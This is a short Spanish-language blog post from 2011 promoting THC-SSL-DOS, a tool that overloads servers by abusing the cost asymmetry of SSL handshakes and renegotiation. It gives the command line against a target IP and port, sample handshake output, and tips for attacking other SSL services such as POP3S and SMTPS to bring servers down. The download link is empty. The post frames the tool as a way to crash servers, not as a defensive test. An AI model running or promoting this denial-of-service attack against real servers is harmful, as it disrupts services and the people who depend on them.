miércoles, 2 de noviembre de 2011

[DoS/DDoS] THC SSL Tool

THC-SSL-DOS es una herramienta para comprobar el rendimiento de las conexiones SSL. Establecer una conexion segura requiere 15 veces mas procesamiento en el servidor que en el cliente. Esta herramienta usa esa propiedad para sobrecargar el servidor y provocar que se caiga. Este problema afecta a todas las implementaciones de SSL.






Ejemplo de uso:

./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
- Los servidores normalmente suelen hacer 300 handshakes por segundo. Esto requeriria 10-25% del CPU de un portatil.
- El puerto HTTPS (443) no es siempre el mejor para realizar los ataques. Prueba tambien con otros puertos y servicios como POP3S, SMTPS, ...

Descarga:

Publicado por untrusted en 20:07:00
Etiquetas: , , , , , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)